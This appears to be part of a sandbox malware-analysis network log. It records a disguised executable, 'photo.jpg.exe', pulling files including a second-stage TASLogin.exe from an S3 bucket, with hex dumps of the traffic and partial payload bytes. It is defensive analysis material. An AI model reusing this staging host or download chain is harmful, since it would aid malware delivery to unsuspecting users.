                                      2025-04-02 14:22:43 UTC16384INData Raw: 47 42 24 ec ae 08 4f 62 a5 b9 c6 77 58 df 57 50 69 94 38 33 3d d5 5c 42 ea 19 c3 bf e3 02 86 0a b9 53 4a 01 b7 90 e7 2f 6c 77 3f 19 06 d2 e0 e0 bd b3 1d 2d 03 7c 62 34 cf 51 b0 3f 8f 9e 08 b0 a1 07 8d 81 37 4a 1f 6f 60 b9 e9 35 24 ab f7 44 2f b9 8a 23 73 ac 1f de 0e d3 7a 01 c3 99 2e ad e1 0e 95 25 d7 a5 09 cc e7 8c 18 e1 a7 e0 ea fd 4b a1 16 36 42 ee f4 85 fe f5 04 3f f0 dd 6b 4d e2 c8 92 70 95 a6 bd 24 cc ce cd 6e f2 1a 61 97 e0 69 0c 7b f6 95 b5 75 85 32 0d 46 81 28 f0 1a da d7 78 82 71 31 85 e9 2b 5a d6 59 82 f5 79 6d 3c 9a fe 42 4c 8a fb 5d 7e 69 db df ee 34 17 f8 09 f8 90 fb fb 49 84 5a ff 4f e8 00 1a 16 66 3b ba 6d bc a0 68 50 db 2e 00 35 31 09 43 48 a5 ef fa 0d f4 ef 32 e1 dd 28 77 fd 6d 3d b8 69 cc cc 8f 5b 31 5f 3c 9f 70 1e 36 3e 65 aa ce 58 cc
                                      Data Ascii: GB$ObwXWPi83=\BSJ/lw?-|b4Q?7Jo`5$D/#sz.%K6B?kMp$nai{u2F(xq1+ZYym<BL]~i4IZOf;mhP.51CH2(wm=i[1_<p6>eX
                                      2025-04-02 14:22:43 UTC512INData Raw: af f5 2b 0a 81 55 66 a3 d4 56 e2 fb 21 b7 af 4c 2a 76 aa 70 2c dd 8e 64 77 46 16 15 44 b4 9d 65 25 c5 4b 31 99 19 46 cd c1 3b c0 91 67 fa 35 8b b6 9d 89 b6 f1 d7 95 18 6f 4a 8f 85 a4 23 65 f2 ed 26 81 cd 51 13 d7 19 7b dc 78 82 a9 f8 09 8b ba 9e 46 a3 d8 d7 3c 5d 86 60 26 a8 7b 64 17 16 47 54 fc 96 60 49 c9 e4 f8 f2 9a da c6 a6 3a d3 5d 07 e8 4d b5 ff 35 92 7d 33 d3 1a 71 6e db b4 b8 b6 aa 32 67 84 0d 4a a7 1c 98 15 ef cd ee 09 db e8 6d 69 6f f1 55 4d 1a 41 1f 72 bd 11 ed f1 ec c3 3f bf d6 b8 34 93 ae a9 53 46 d9 91 99 a1 c4 e3 90 56 0d 99 6c 28 01 12 ed 02 e5 24 70 0a 67 61 18 57 e2 39 fe 5d 43 87 80 3c ee 92 e4 b6 8d 55 1b ed d8 40 f5 66 fd b7 e2 cc d5 40 b5 0b 27 2a 31 27 97 bd d9 f0 3b 02 28 7e 85 94 ca 95 94 4b 3e 1e f9 78 19 57 4b aa 27 ef bb 7e 6b
                                      Data Ascii: +UfV!L*vp,dwFDe%K1F;g5oJ#e&Q{xF<]`&{dGT`I:]M5}3qn2gJmioUMAr?4SFVl($pgaW9]C<U@f@'*1';(~K>xWK'~k
                                      2025-04-02 14:22:43 UTC16384INData Raw: 9e f2 21 76 87 aa 83 e2 24 ea cd 5e d4 32 9d 73 62 f3 fa 5e 8d de ae cf f4 c9 47 e9 4e 88 5f 69 43 f3 92 e5 99 da 73 38 b1 04 62 d9 d2 83 c8 f1 d2 78 3b 5a 36 65 3c c0 62 f0 45 b0 af 11 d9 40 54 fd c4 b8 e1 6d a7 05 f2 2f 8c 89 56 cd 47 df a7 e1 5e 5b 51 36 4a 1b c6 5b 1a 38 16 e7 6f 9c 82 1f da c8 19 11 2d 8a 48 ee cd 89 fe 2b 26 fa 7c 7a 5b b2 52 37 94 31 ca 3d 80 80 84 34 74 6c fe c1 94 ad 29 9c b1 85 3b c5 59 07 98 3c 65 7c 41 0a e5 78 81 10 ff 0c 37 ff 97 1d 27 a0 48 49 1f 60 dd 86 dc 2f 5a 4b 6a c8 c7 9e cc 27 8d c5 3c e8 ca 06 d4 7b e4 61 0e 0b ba 34 15 61 b7 cd d2 17 96 08 d3 cb 13 01 cd e1 c5 26 52 10 72 e7 db 25 39 78 51 b5 03 39 2c 51 b3 46 8c ee 9b f7 34 ee 79 64 22 b7 5a ee db fc 26 fd e5 c0 57 0b 33 1f 33 e5 0d fa 29 36 0b d2 ed 71 47 87 1f
                                      Data Ascii: !v$^2sb^GN_iCs8bx;Z6e<bE@Tm/VG^[Q6J[8o-H+&|z[R71=4tl);Y<e|Ax7'HI`/ZKj'<{a4a&Rr%9xQ9,QF4yd"Z&W33)6qG
                                      2025-04-02 14:22:43 UTC1024INData Raw: 42 29 57 36 c7 f0 bd 6a 1b b7 6e 44 58 d1 42 57 ce 5d fc ed dc 76 b6 c5 00 f5 f3 5d 7f 45 3e 91 f9 e1 93 89 fa d2 fd 13 70 8c 6c 57 bf 71 7b cc 65 b1 22 26 01 13 86 82 ae 46 26 b9 38 64 55 5d df 28 26 a8 db 9a 83 f6 b2 87 5c c7 b4 f0 68 53 d0 3b c2 51 2a 1c 6d 86 b3 e8 b0 93 1a 16 84 7c fd 3f f6 a0 20 4e 4f 5f 19 02 3c b9 b7 f2 44 01 ce 21 1d 24 f0 f4 f7 a1 0c 72 dd 11 cd c6 86 bb e4 0d 46 aa 82 8e 47 e0 f8 64 6a e3 2c 93 9d df 7d 00 02 1e c9 d6 58 a2 56 75 3e 13 0c 33 9e ca e9 47 f4 71 a6 87 7c b6 ac 01 df 14 41 e7 87 54 5e 1c 26 cc 0f 68 04 59 ee 66 67 1b 0b 6b dc 67 d6 a6 ad 38 dc 98 00 98 20 f8 f7 52 39 38 c8 04 b7 0f d5 06 52 69 32 c5 71 b6 e3 a3 19 94 3d 94 23 90 77 3a 87 53 42 cb 3c 29 58 37 de af 28 84 4b 38 b9 71 c4 c1 37 ef f5 11 31 6e bb d1 3f
                                      Data Ascii: B)W6jnDXBW]v]E>plWq{e"&F&8dU](&\hS;Q*m|? NO_<D!$rFGdj,}XVu>3Gq|AT^&hYfgkg8 R98Ri2q=#w:SB<)X7(K8q71n?
                                      2025-04-02 14:22:43 UTC16384INData Raw: d8 c7 57 09 aa 5f 08 42 88 b4 01 be 90 25 63 94 24 2b 2f 7a 4b ee ac ce c9 9f e5 48 4a 43 98 04 fe 84 3d 52 7f 2d 5a 3d 7c 22 4e d7 5e 87 c2 64 47 78 c4 b2 4a 40 ad 16 6f 75 f2 78 1e 0a 99 03 a8 b6 ca ce a3 56 2e c3 a5 ab 83 84 bd e9 c5 08 f6 82 28 ca c7 e6 66 c3 66 41 97 6d f5 dd e4 22 79 3b d0 e7 71 5d c5 a0 ca 9a 2f 46 b9 d4 27 2b ab f6 e8 5c 2b 2d 33 19 de e3 70 e7 0f 22 ef 7d 4e da b2 b6 f2 bd 3e dc 67 74 ec 90 68 9c de d1 1b 09 35 e9 90 34 ba ed f2 88 e1 ef 5f 44 ab ec b6 29 da 9a 65 c8 88 56 90 99 f7 9e 9f 0a d1 52 d4 ca 8c bb 36 b8 f8 21 87 73 47 53 91 96 b7 ca be 07 94 58 df 57 66 32 3a 48 97 0f 44 29 89 e6 81 08 2c aa 76 1b c2 16 e3 a7 85 f5 0b 69 22 4f 5e 75 5d c5 fa 70 26 92 69 a4 d6 c0 85 1c 54 0f 87 fb 02 2a 20 9f 94 bf c4 bb 31 01 db c1 8c
                                      Data Ascii: W_B%c$+/zKHJC=R-Z=|"N^dGxJ@ouxV.(ffAm"y;q]/F'+\+-3p"}N>gth54_D)eVR6!sGSXWf2:HD),vi"O^u]p&iT* 1
                                      2025-04-02 14:22:43 UTC1024INData Raw: b6 7d 8b fc 21 71 d5 0a fa ab 06 e2 7b b9 27 72 0a 4e c2 f8 2e 3d d4 97 72 a1 ca 5e f8 b2 55 d7 74 27 8e 2c 6d f6 6b dd b8 d9 77 b9 cf 41 a8 c3 4a 68 e2 b4 c0 37 3f bb fb 26 d8 c5 65 81 37 82 45 34 7b d3 01 03 27 68 6c 74 b5 a4 49 8e 2a e0 38 99 0b 81 a5 2b b0 4b 53 1b 7b c3 10 4e c3 6a af bd ee 83 62 36 1b 9c 15 43 ae 7a 85 40 1d 17 b3 a0 f0 2c b7 c8 f7 2a 3c e6 ce de 04 e4 09 46 1b 70 64 11 7e 97 e7 2b 4a 45 16 24 71 29 1d ca 83 ae 53 19 79 b6 b3 6f 4c 8c 3c 9a 55 41 b5 98 ee ac d4 23 ad fc e7 ef 96 82 5b 90 2e ce 8a 01 23 e9 b6 12 01 3f bc bd 46 41 91 c6 93 d9 16 cd 7a a5 21 cb be 7a 3b 11 b6 2e bd b4 f8 1d 54 0b 78 e3 4f a3 78 6b 15 92 a1 7e 2d 5b f2 25 6f 70 f7 48 6e 7c 40 d5 37 b5 ea 3a f1 47 84 65 64 1b 71 ec 9d 6b d0 21 d4 ab f6 97 32 20 85 0b b5
                                      Data Ascii: }!q{'rN.=r^Ut',mkwAJh7?&e7E4{'hltI*8+KS{Njb6Cz@,*<Fpd~+JE$q)SyoL<UA#[.#?FAz!z;.TxOxk~-[%opHn|@7:Gedqk!2
                                      2025-04-02 14:22:43 UTC10749INData Raw: a9 02 dc 72 6f c8 ce 0d 03 cb 91 5d 5d 4c fa 84 a3 8e a9 73 3c cd b1 98 b0 66 91 22 42 de 56 dd 68 08 83 21 b0 1c 67 b5 8c c0 8e b9 5f 66 5f 1d 6b b0 aa 5e ce 96 1e 32 56 f4 b5 7a 15 36 d2 d9 c9 a2 72 37 b0 a5 89 f6 5a d7 b2 ee 2c fc d1 de 9c 58 e6 af 44 c5 13 d2 00 16 ca b8 eb 82 88 53 bf 40 12 3a cd 27 18 b6 34 a4 a0 4a 0a 09 74 dc 21 5c 6b 9c 14 bc 9b 0d 38 0e 6e f2 fd 32 e6 11 8a b6 37 94 31 c0 ec c7 df 47 63 61 98 15 95 0f df 78 69 91 89 c5 d8 21 7e 29 68 5d f5 2e d7 7d 7e ff ff d1 70 91 df 8a d5 79 32 79 f7 7f b4 77 ea 53 89 e7 ff ab 17 97 a4 e9 9b 16 6c 07 47 43 f2 cf 9e 0c 02 88 cb f4 ef 7c e9 c3 6e 53 31 4e 8e 5c 64 98 08 e2 b4 02 de de 4e 3e 74 81 4d b5 c2 61 d3 5e 7c ff 03 9d 7d 2b cf be a8 13 d0 b9 1a 9d 26 b4 79 87 ba 35 d0 2a 0d 28 8b ee 9a
                                      Data Ascii: ro]]Ls<f"BVh!g_f_k^2Vz6r7Z,XDS@:'4Jt!\k8n271Gcaxi!~)h].}~py2ywSlGC|nS1N\dN>tMa^|}+&y5*(
                                      2025-04-02 14:22:43 UTC16384INData Raw: e4 59 42 57 c9 62 44 49 92 05 22 af ba a7 79 85 f0 8d 94 91 96 8c 39 ba cc fa b2 d8 80 09 32 e6 80 ce 11 fc 8e 40 69 2e 36 a4 c3 16 a4 7f ea 54 f7 4e d6 d5 66 86 f2 82 23 b6 a7 29 50 86 53 f6 e2 5f 14 0e 33 73 c0 42 50 5f ff fc c6 79 50 64 58 0d 91 af bf e0 8a 8c 9b 3e f4 fe f0 5e 10 af a4 03 1e 8b eb a3 e7 f0 f2 93 ba d5 13 fd fd 9d e0 15 37 e4 34 8f 18 14 fd 5b 59 7f 52 a2 b9 0d 02 4d 3f 19 7e 5d 7a ef a8 ae 3f 62 e5 94 8b a2 cc 11 9d a9 7b 7b 7b 27 03 22 70 ad 1b 86 3e 1d b6 3c 79 99 df 2a 98 bf d6 5c 30 93 c9 cd 78 81 4e 86 91 0f c8 60 db 26 e4 c5 ad 2f 4a 3d ec a8 d6 97 38 e1 b9 60 4e dc 31 38 44 f9 a2 2e 49 84 b3 74 38 fa c9 42 8f 93 0e 64 47 5f b4 c8 be 10 c7 6a ab 0b 2f 73 8a e8 60 6d 9f e0 1f a2 35 9e 6b 17 e6 39 06 b0 1e 4a 4d f7 7e fb e4 11 c1
                                      Data Ascii: YBWbDI"y92@i.6TNf#)PS_3sBP_yPdX>^74[YRM?~]z?b{{{'"p><y*\0xN`&/J=8`N18D.It8BdG_j/s`m5k9JM~
                                      2025-04-02 14:22:43 UTC1024INData Raw: 35 b4 11 8d dd 40 3f 51 54 06 d9 54 69 aa 19 cf 83 80 b9 2f cf 68 4b 9a e8 b9 79 8f 7e 08 2e 7d 06 fc 71 aa 31 45 9c dc e9 6c c6 46 c5 30 f1 d9 84 2b b0 90 e1 b7 fb 60 8c 9c 4f c0 1b 09 fc 75 a1 7c 0e ec 36 1d 5d e0 09 94 ee 42 8c 51 12 f7 f0 9c 8b e0 49 fe ec e9 23 a8 e6 45 c5 3e 8f 30 53 83 ba de e1 16 86 e5 a2 b4 03 38 9a b7 88 b5 f4 8f 13 09 b4 98 67 4d 11 d9 60 e8 e8 70 f2 35 fa c4 5d 09 0d df 6e b9 9b b9 0d 57 ed 1e 69 0a d1 39 a3 d1 2a dc d7 d6 32 c9 8c 47 29 e0 fb a2 c6 9b 03 93 92 f0 42 88 e3 bd 32 e7 0a 56 7a 5d af ac a0 c9 20 c3 96 86 b8 4d aa 53 ae 79 cd fc 2e a8 d3 19 e3 20 6e 4a 2a 06 b6 88 bf f4 b8 d2 c1 65 72 9d 47 48 45 86 7d 82 ba 9c 83 6a 01 a5 20 56 5c 61 86 e5 38 da 1b d3 4c 79 21 97 95 da fc 3f 91 53 a4 38 b2 c0 67 e5 d5 71 5d bf 03
                                      Data Ascii: 5@?QTTi/hKy~.}q1ElF0+`Ou|6]BQI#E>0S8gM`p5]nWi9*2G)B2Vz] MSy. nJ*erGHE}j V\a8Ly!?S8gq]
                                      2025-04-02 14:22:43 UTC16384INData Raw: 4e 26 22 31 39 0a 24 b9 73 ca e9 b3 2d 0a 58 0b 46 89 55 76 d6 0c 67 6f 2f 66 86 3a 54 37 f8 97 77 da 23 75 90 ff f7 e8 04 90 cd 38 bf 6c ce 3c 38 ea d5 10 52 13 ae cf 47 19 12 f7 3d b6 f0 07 76 17 d1 eb 0f a9 a5 89 24 13 d9 c4 a0 e5 43 d4 a5 9c 0f f2 74 f1 2e 22 53 4b fb 50 d5 a6 c3 8d 0f 70 ae c9 b1 ed 4f b1 b0 fd 39 45 93 20 24 81 54 0e 77 db e8 0c 3e 92 ee ed 44 50 8f 49 82 89 78 12 a4 fd 82 de 29 2e 55 29 05 f1 61 a5 0b 19 d6 31 24 ec dc 39 31 1b 95 b6 07 84 8f 21 87 0d 73 41 2a d9 9f 5b 1b 2a 80 5e 5e d2 14 e6 a9 fc b1 21 76 1f 8f 3a 93 ca 4e 4f c9 d4 8d 15 31 e0 12 90 92 a7 a1 29 b8 69 c6 1a 60 70 99 a7 98 74 e0 35 a6 c1 ef a4 7c 27 05 14 37 5d d5 c9 34 d1 65 9d c2 c1 aa ae 90 6e 65 e8 d9 72 33 a6 64 35 46 a4 96 7d d0 a4 45 c0 dc a2 71 95 53 2b 28
                                      Data Ascii: N&"19$s-XFUvgo/f:T7w#u8l<8RG=v$Ct."SKPpO9E $Tw>DPIx).U)a1$91!sA*[*^^!v:NO1)i`pt5|'7]4ener3d5F}EqS+(


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      7192.168.2.9496983.5.146.1834437144C:\Users\user\Desktop\photo.jpg.exe
                                      TimestampBytes transferredDirectionData
                                      2025-04-02 14:22:58 UTC79OUTHEAD /TASLogin.txt HTTP/1.1
                                      Host: imagesyd.s3.ap-southeast-1.amazonaws.com
                                      2025-04-02 14:22:59 UTC445INHTTP/1.1 200 OK
                                      x-amz-id-2: gKTayPp1KIkWiws78qVEtOWsXT17rp4//DtlOZd/aDIs3BzMNtYyX9TbHoJ0bIXfQz3Go1yB4AIMm4sQumi91gl9MQdrjh3r4gZgO3HvxpI=
                                      x-amz-request-id: 5VVAQ84AF610F90E
                                      Date: Wed, 02 Apr 2025 14:23:00 GMT
                                      Last-Modified: Sat, 15 Mar 2025 14:35:12 GMT
                                      ETag: "d476ff5557309a1349660fab8efc4179"
                                      x-amz-server-side-encryption: AES256
                                      Accept-Ranges: bytes
                                      Content-Type: text/plain
                                      Content-Length: 11
                                      Server: AmazonS3
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      8192.168.2.9497013.5.146.1834437144C:\Users\user\Desktop\photo.jpg.exe
                                      TimestampBytes transferredDirectionData
                                      2025-04-02 14:23:00 UTC95OUTGET /TASLogin.txt HTTP/1.1
                                      Range: bytes=0-
                                      Host: imagesyd.s3.ap-southeast-1.amazonaws.com
                                      2025-04-02 14:23:00 UTC488INHTTP/1.1 206 Partial Content
                                      x-amz-id-2: R3Eqm8lVa8PcCRvQCjf+7ahBcgt9FNs2VrW7VguYUlgQJ784jWLUG1FIacJi3GPqlKHtLc7FpuDob9mtmBgXF/HorvDL3KAY/cx38ni0o+s=
                                      x-amz-request-id: JVFJGSH9ZXB768J2
                                      Date: Wed, 02 Apr 2025 14:23:01 GMT
                                      Last-Modified: Sat, 15 Mar 2025 14:35:12 GMT
                                      ETag: "d476ff5557309a1349660fab8efc4179"
                                      x-amz-server-side-encryption: AES256
                                      Accept-Ranges: bytes
                                      Content-Range: bytes 0-10/11
                                      Content-Type: text/plain
                                      Content-Length: 11
                                      Server: AmazonS3
                                      Connection: close
                                      2025-04-02 14:23:00 UTC11INData Raw: 35 39 33 2e 33 31 31 35 2e 35 36
                                      Data Ascii: 593.3115.56


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      9192.168.2.9497023.5.146.1834437144C:\Users\user\Desktop\photo.jpg.exe
                                      TimestampBytes transferredDirectionData
                                      2025-04-02 14:23:01 UTC76OUTHEAD /image.jpg HTTP/1.1
                                      Host: imagesyd.s3.ap-southeast-1.amazonaws.com
                                      2025-04-02 14:23:02 UTC447INHTTP/1.1 200 OK
                                      x-amz-id-2: fPh+LTV1HHNL2bGYGi4/Za0GGM49i0z47vSHoXGp3s5SlUEQA5+esE0eX9P4S/EcGImOfiIVGYtLxwmEMYYBLTyJqo96bULUO3hoCIsRkiI=
                                      x-amz-request-id: PD1Q1S2JKFQF96FC
                                      Date: Wed, 02 Apr 2025 14:23:03 GMT
                                      Last-Modified: Sat, 15 Mar 2025 14:39:16 GMT
                                      ETag: "23e20aec94c80e49b5ea7893443e397e"
                                      x-amz-server-side-encryption: AES256
                                      Accept-Ranges: bytes
                                      Content-Type: image/jpeg
                                      Content-Length: 6420
                                      Server: AmazonS3
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      10192.168.2.94970452.219.124.234437144C:\Users\user\Desktop\photo.jpg.exe
                                      TimestampBytes transferredDirectionData
                                      2025-04-02 14:23:03 UTC92OUTGET /image.jpg HTTP/1.1
                                      Range: bytes=0-
                                      Host: imagesyd.s3.ap-southeast-1.amazonaws.com
                                      2025-04-02 14:23:03 UTC462INHTTP/1.1 206 Partial Content
                                      x-amz-id-2: 1+uB8srAbbdpRoPObVAC0xVbsz68BczojDfHIB5xhpYXUsoJX4gI2vF6Ks8PlryBl5e/SiDawAI=
                                      x-amz-request-id: KBYY81C0RR69JD28
                                      Date: Wed, 02 Apr 2025 14:23:04 GMT
                                      Last-Modified: Sat, 15 Mar 2025 14:39:16 GMT
                                      ETag: "23e20aec94c80e49b5ea7893443e397e"
                                      x-amz-server-side-encryption: AES256
                                      Accept-Ranges: bytes
                                      Content-Range: bytes 0-6419/6420
                                      Content-Type: image/jpeg
                                      Content-Length: 6420
                                      Server: AmazonS3
                                      Connection: close
                                      2025-04-02 14:23:03 UTC6420INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e2 01 db 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 01 cb 00 00 00 00 02 40 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 00 00 00 00 00 00 00 00 00 00 00 00 61 63 73 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 f6 d6 00 01 00 00 00 00 d3 2d 51 74 05 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 72 58 59 5a 00 00 00 f0 00 00 00 14 67 58 59 5a 00 00 01 04 00 00 00 14 62 58 59 5a 00 00 01 18 00 00 00 14 77 74 70 74 00 00 01 2c 00 00 00 14 63 70 72 74 00 00 01 40 00 00 00 0c 72 54 52 43 00 00 01 4c 00 00 00 20 67 54 52 43 00 00 01 4c 00 00 00 20 62
                                      Data Ascii: JFIF``ICC_PROFILE@mntrRGB XYZ acsp-QtrXYZgXYZbXYZwtpt,cprt@rTRCL gTRCL b


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      11192.168.2.94970752.219.124.234437144C:\Users\user\Desktop\photo.jpg.exe
                                      TimestampBytes transferredDirectionData
                                      2025-04-02 14:23:06 UTC79OUTHEAD /TASLogin.exe HTTP/1.1
                                      Host: imagesyd.s3.ap-southeast-1.amazonaws.com
                                      2025-04-02 14:23:07 UTC431INHTTP/1.1 200 OK
                                      x-amz-id-2: X7R4MniF/gdoLx3aaMAwtIZJ4hxQk8FI3H0iIlWtaw6EB1E5z8N63KSkKIGhnkWQTGwZY4WPDiE=
                                      x-amz-request-id: ANXQBG30YBZA5Q7S
                                      Date: Wed, 02 Apr 2025 14:23:07 GMT
                                      Last-Modified: Sat, 15 Mar 2025 15:30:24 GMT
                                      ETag: "7ca41e122724c2d808bf73b7a5129365"
                                      x-amz-server-side-encryption: AES256
                                      Accept-Ranges: bytes
                                      Content-Type: application/octet-stream
                                      Content-Length: 995560
                                      Server: AmazonS3
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      12192.168.2.94970852.219.132.994437144C:\Users\user\Desktop\photo.jpg.exe
                                      TimestampBytes transferredDirectionData
                                      2025-04-02 14:23:07 UTC95OUTGET /TASLogin.exe HTTP/1.1
                                      Range: bytes=0-
                                      Host: imagesyd.s3.ap-southeast-1.amazonaws.com
                                      2025-04-02 14:23:08 UTC482INHTTP/1.1 206 Partial Content
                                      x-amz-id-2: iJBV9+EP/OU7UKU8HX8JuZFYaSCthaDu0mSQSj5UOzTE+l6D9ivVyqC/XuIl3U54TKGcRw0D+6I=
                                      x-amz-request-id: DWQ9K3ZHA1TQ91DP
                                      Date: Wed, 02 Apr 2025 14:23:09 GMT
                                      Last-Modified: Sat, 15 Mar 2025 15:30:24 GMT
                                      ETag: "7ca41e122724c2d808bf73b7a5129365"
                                      x-amz-server-side-encryption: AES256
                                      Accept-Ranges: bytes
                                      Content-Range: bytes 0-995559/995560
                                      Content-Type: application/octet-stream
                                      Content-Length: 995560
                                      Server: AmazonS3
                                      Connection: close
                                      2025-04-02 14:23:08 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 58 09 0f 00 48 00 00 00 00 00 00 00 4e 4f 7b 67 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e3 3a 94 0d a7 5b fa 5e a7 5b fa 5e a7 5b fa 5e ae 23 69 5e b7 5b fa 5e f5 2e fe 5f ab 5b fa 5e f5 2e f9 5f af 5b fa 5e f5 2e ff 5f 8f 5b fa 5e f5 2e fb 5f a3 5b fa 5e 43 2b fe 5f a4 5b fa 5e 43 2b fb 5f b0 5b fa 5e a7 5b fb 5e 06 5a fa 5e 6b 2e f3 5f ba 5b fa 5e 6b 2e 05 5e a6 5b fa 5e 6b 2e f8 5f a6 5b fa 5e 52 69 63 68 a7 5b fa 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                      Data Ascii: MZ@XHNO{g!L!This program cannot be run in DOS mode.$:[^[^[^#i^[^._[^._[^._[^._[^C+_[^C+_[^[^Z^k._[^k.^[^k._[^Rich[^
                                      2025-04-02 14:23:08 UTC542INData Raw: ba e7 bc 30 c3 8f 22 76 37 bf 0f 5b 16 5e 7c 44 1b cd 87 77 c7 24 0b e7 56 64 19 97 f7 6e b0 f8 b2 2a 4d df 83 cf 67 71 82 87 61 b8 56 ce 9f ff 56 ff 01 ef 11 59 05 a6 97 50 a5 1b 45 0e 57 4c 25 a5 2b bc 24 0b f7 27 47 60 c9 25 e4 2f 71 86 a6 8d 08 ef f5 11 fe e2 93 56 db ce ce 7a 88 2b 5c 4f 28 80 36 27 76 60 4e c4 4d 4a de 4f 6e f2 7a f2 2c 00 0a 98 ad a0 1d bf 0d 49 88 30 15 3c 6a 04 b4 6d dd c2 15 12 6f f7 c5 83 0c 0c c5 70 86 b9 f8 de a0 9c c4 2f ef f0 90 dd 4a c4 8b 57 0a 28 0d fb 1a 0e 31 b2 77 b6 21 b5 d3 70 f4 28 01 b2 a1 ac 0c 91 41 a0 7b be 3e 96 90 90 b5 8d 88 8b 65 b5 d8 ba 7f dd 57 e5 14 26 dc 49 d2 88 51 c1 21 a4 bc 51 18 79 37 55 2e 70 c0 36 f2 db 3e 27 f9 d9 aa 0b 6d 91 26 b1 d7 8e 18 ab 27 69 3c 45 93 b7 a6 70 1b 1b 5f 00 f1 33 fc c5 5b
                                      Data Ascii: 0"v7[^|Dw$Vdn*MgqaVVYPEWL%+$'G`%/qVz+\O(6'v`NMJOnz,I0<jmop/JW(1w!p(A{>eW&IQ!Qy7U.p6>'m&'i<Ep_3[
                                      2025-04-02 14:23:08 UTC16384INData Raw: ac 4f e6 68 01 c8 7f 3a e8 52 9f d4 d6 cc f9 79 7f de ed 8c 38 9e 51 ec c0 06 b4 42 61 93 cb d9 3a b7 af e9 f7 75 c2 91 db 57 cc e8 52 99 f2 84 8a c3 73 ee 34 39 7f ec 96 c7 5f 25 dc 97 be 0e f9 5d c7 62 2d 97 d4 38 de 51 0c e9 12 7c 30 8b b8 c0 89 bd c6 83 bb ae f3 1f b9 8f 03 87 b3 0c ac 8c 1c 2b 8e 10 aa 72 c5 ce 31 ef 5e 36 f1 d8 99 02 9a db a8 17 b4 21 3e eb bf d4 5d d1 cb 45 cc 63 41 b1 a6 ce 08 24 f6 53 e2 b1 cb f0 aa db 2b 8e e8 50 17 7b 75 f7 8d 32 45 c4 66 b2 53 c2 fd d4 65 12 53 51 98 cc 45 73 ed ff 5c 71 43 d0 7c 06 39 38 8e d1 ca fa 00 3a de d9 2d 2c 72 b3 0d 81 cf 44 ee 3f 07 69 a5 f6 f4 0b 50 47 5c 5e 08 70 35 5b 07 7b 43 ae 31 1a 69 5f 05 c5 ba d5 4b 4f 57 71 09 ef e6 cf cb e5 f4 a8 8d 2f 09 a8 68 88 1e e7 34 a7 17 6d 90 db 96 47 14 b0 f4
                                      Data Ascii: Oh:Ry8QBa:uWRs49_%]b-8Q|0+r1^6!>]EcA$S+P{u2EfSeSQEs\qC|98:-,rD?iPG\^p5[{C1i_KOWq/h4mG
                                      2025-04-02 14:23:08 UTC1024INData Raw: 43 1d 0d 81 78 9c 7a 9a 0c a7 5d f3 0a d4 ee ee ad 74 b3 17 dc 78 4f a4 b1 26 d9 b6 bb b2 8b 84 c2 b3 c6 d9 56 62 77 21 d5 d7 9b 89 ee b0 af 5d de 91 95 38 79 65 88 11 f0 fb 88 3d 93 74 a2 1e 1d 7c eb 9e f0 dd c5 97 25 df 2e 78 01 cd 6a 99 ce 0a 1f 65 d9 cd 0e e5 e4 88 14 5d c6 5c c9 22 be b5 00 df 3e 69 7e ed 7b ba 0e 31 83 07 96 03 e4 8c 00 c3 e7 a7 81 06 24 21 65 dd b5 ed b1 b4 71 c0 7c 54 d4 ca 68 7d 59 86 41 e7 6f 31 05 64 91 43 d5 58 64 38 4a bd 67 ef 2e 41 71 f7 b1 71 a4 ec e8 a7 ce 5d 83 a4 51 d0 0a 38 5a ea 29 e0 ee 1d cf 7e ce 31 1d e1 e8 ae c3 7a f8 7b 41 49 ac 57 5c d2 13 b7 c5 31 7a 8e ee 8a 86 7d 0c 38 f6 95 eb b0 a3 c7 18 88 12 45 66 10 da b8 6d 20 47 3f af 53 1c f5 22 ef 6e 9b a7 5b b0 bf 3f 91 d6 97 3c 93 d9 17 0b c4 81 ed 6f 8b 81 08 db
                                      Data Ascii: Cxz]txO&Vbw!]8ye=t|%.xje]\">i~{1$!eq|Th}YAo1dCXd8Jg.Aqq]Q8Z)~1z{AIW\1z}8Efm G?S"n[?<o
